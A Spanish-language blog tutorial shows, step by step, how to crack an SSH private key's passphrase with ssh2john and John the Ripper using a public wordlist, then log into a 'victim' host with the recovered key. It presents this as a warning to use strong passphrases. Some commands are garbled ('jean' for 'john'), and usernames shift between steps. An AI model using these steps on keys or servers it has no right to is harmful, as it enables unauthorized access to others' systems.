Crackea la clave privada SSH con John the Ripper

Crackea la clave privada SSH con John the Ripper - Codelivly

 

El código de clave privada SSH no debe ser solo una decoración. Desafortunadamente, algunas personas piensan que nunca perderán su clave privada SSH y se olvidan de usar una contraseña segura.

En la guía 10 Simple Steps to Secure SSH vimos el protocolo SSH (de Secure Shell) que se usa para conexiones seguras (encriptadas) con computadoras/servidores remotos. Se usa no solo para ejecutar comandos en la terminal del servidor, sino también para transferir archivos hacia y desde el servidor (por ejemplo, con FileZilla para transferir archivos al servidor) o incluso para transferir audio a través de ssh.

Entonces entiendes por lo anterior su "poder" y lo importante que es tener ssh seguro. Desafortunadamente, algunos no se dan cuenta de la gravedad del problema y los que sufren del "¿Me va a pasar esto a mí?" "síndrome. servidores se convierten en peones de la botnet FritzFrog | Ataques a los servidores SSH por parte de una sofisticada botnet peer-to-peer (P2P) que compromete los servidores SSH.

Cuando se trata del código SSH y lo que es una contraseña segura, no necesita ser educado, tres o cuatro palabras simples conectadas por signos de puntuación hacen un buen patrón seguro para contraseñas y contraseñas.

Seguridad de la contraseña
fuente: https://xkcd.com/936/

Solo asegúrese de recordar la contraseña. Entonces, en el siguiente escenario, veremos qué sucede si no lo solucionó en los primeros 10 minutos en un servidor nuevo con configuraciones de seguridad básicas, o si logró perder su clave privada SSH en la que había puesto un código fácil.

Índice
  1. Instale SSH2John en su computadora
  2. Descifrar la clave privada
  3. Acceso SSH a la víctima
  4. Pensamientos finales

Instale SSH2John en su computadora

SSH2John es Si no tiene instalada la versión Jumbo de John the Ripper, deberá descargar ssh2john de GitHub, ya que no está incluido en Kali Linux. Si no tiene John the Ripper instalado, puede aprender cómo instalarlo desde su GitHub.

Abrimos una terminal y lo descargamos:

~# wget
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03--
https://raw.githubusercontent.com/magnumripper/JohnTh
eRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-
KB/s in 0s

Ahora vamos a descifrar la clave privada SSH.

Descifrar la clave privada

Todo lo que tenemos que hacer es ejecutar la herramienta ssh2john en la clave privada y canalizar los resultados a un nuevo archivo hash usando:

python ssh2john.py id_rsa > id_rsa.hash

A continuación, usaremos a John the Ripper para descifrar la contraseña. Pero primero, necesitamos una lista de palabras adecuada. Para los propósitos de esta guía, usaremos una pequeña de 100 palabras para mostrar cómo hacerlo de una manera fácil. Descargalo:

~# wget
https://raw.githubusercontent.com/danielmiessler/SecL
ists/master/Passwords/darkweb2017-top100.txt

Ahora ejecute John en Kali Linux como de costumbre, proporcionándole la lista de palabras y el archivo hash:

jean –wordlist=darkweb2017-top100.txt id_rsa.hash

Note: This format may emit false positives, so it
will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key
for status
1q2w3e4r5t (id_rsa)
Session completed

Podemos ver que reconoció nuestra contraseña, pero para estar seguros, usemos el comando –show para comprobarlo:

john --show id_rsa.hash
id_rsa:1q2w3e4r5t
1 password hash cracked, 0 lef

Como puede ver, incluso 1q2w3e4r5t, que puede parecer difícil de descifrar para el ojo común... desafortunadamente para usted que lo usa... es una cuestión de vocabulario.

Acceso SSH a la víctima

Con la llave rota, todo lo que queda es usarla contra el objetivo para el que se usa la llave en particular. Usando la opción -i en el comando SSH, podemos especificar la clave privada que se usará para la autenticación:

ssh -i id_rsa user@10.10.10.10
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT
accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
luser@10.10.10.10's password

No nos dejará usar la clave si los permisos son demasiado… flojos. Entonces solo necesitamos establecer permisos más estrictos para usar la clave privada:

chmod 400 id_rsa

Ahora podemos conectarnos. Luego ingresamos la contraseña que
cracked, y el mensaje muestra que estamos conectados:

~# ssh -i id_rsa nullbyte@10.10.10.10
Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
luser@target:~$

Pensamientos finales

En esta breve guía, hemos visto cómo descifrar contraseñas SSH.

En la mayoría de los casos esto sucede de forma masiva y automática y las claves SSH se rompen como hojas de lechuga si no prestamos atención a la seguridad general de nuestro sistema, y ​​tenemos la ilusión de que como tenemos un servidor Linux, estamos a salvo. Como habrá leído Basta con el FUD sobre las vulnerabilidades de seguridad de Linux, comprenderá que la seguridad no es un producto final sino un proceso continuo.

Si quieres conocer otros artículos parecidos a Crackea la clave privada SSH con John the Ripper puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas